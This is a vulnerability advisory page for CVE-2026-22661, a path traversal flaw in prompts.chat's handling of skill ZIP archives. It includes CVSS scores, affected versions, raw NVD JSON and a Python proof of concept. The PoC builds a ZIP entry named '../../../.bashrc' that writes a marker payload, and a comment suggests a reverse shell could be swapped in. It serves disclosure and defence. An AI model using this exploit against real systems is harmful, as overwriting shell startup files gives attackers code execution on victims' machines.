Security Vulnerability Report
中文
CVE-2026-22661 CVSS 8.1 HIGH

CVE-2026-22661

Published: 2026-04-03 21:17:09
Last Modified: 2026-04-13 18:23:33
Source: [email protected]

Description

prompts.chat prior to commit 0f8d4c3 contains a path traversal vulnerability in skill file handling that allows attackers to write arbitrary files to the client system by crafting malicious ZIP archives with unsanitized filenames containing path traversal sequences. Attackers can exploit missing server-side filename validation to inject path traversal sequences ../ into skill file archives, which when extracted by vulnerable tools write files outside the intended directory and overwrite shell initialization files to achieve code execution.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:fka:prompts.chat:*:*:*:*:*:*:*:* - VULNERABLE
prompts.chat < commit 0f8d4c3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import zipfile import os # Create a malicious zip file demonstrating the path traversal # Proof of Concept for CVE-2026-22661 malicious_zip = "malicious_skill.zip" # Payload content that will be written to the target file # In a real attack, this could be a reverse shell script or malicious alias payload_content = "echo 'System compromised via CVE-2026-22661' >> /tmp/pwned.txt\n" try: with zipfile.ZipFile(malicious_zip, 'w') as zf: # Use ZipInfo to construct a filename with path traversal sequences # The goal is to write to the user's home directory, e.g., overwriting .bashrc zinfo = zipfile.ZipInfo(filename="../../../.bashrc") # Set a generic date time for the zip entry zinfo.date_time = (2026, 4, 3, 12, 0, 0) # Write the payload to the zip entry zf.writestr(zinfo, payload_content) print(f"[+] Successfully created malicious ZIP file: {malicious_zip}") print("[+] When extracted by a vulnerable prompts.chat version, this will attempt to overwrite .bashrc") except Exception as e: print(f"[-] Error creating zip file: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22661", "sourceIdentifier": "[email protected]", "published": "2026-04-03T21:17:08.970", "lastModified": "2026-04-13T18:23:32.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "prompts.chat prior to commit 0f8d4c3 contains a path traversal vulnerability in skill file handling that allows attackers to write arbitrary files to the client system by crafting malicious ZIP archives with unsanitized filenames containing path traversal sequences. Attackers can exploit missing server-side filename validation to inject path traversal sequences ../ into skill file archives, which when extracted by vulnerable tools write files outside the intended directory and overwrite shell initialization files to achieve code execution."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fka:prompts.chat:*:*:*:*:*:*:*:*", "versionEndExcluding": "2026-03-25", "matchCriteriaId": "2231F343-295D-417B-9925-BA342FB6A8F0"}]}]}], "references": [{"url": "https://github.com/f/prompts.chat/commit/0f8d4c381abd7b2d7478c9fdee9522149c2d65e5", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/f/prompts.chat/pull/1101", "source": "[email protected]", "tags": ["Issue Tracking", "Patch", "Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/prompts-chat-path-traversal-via-skill-file-handling", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.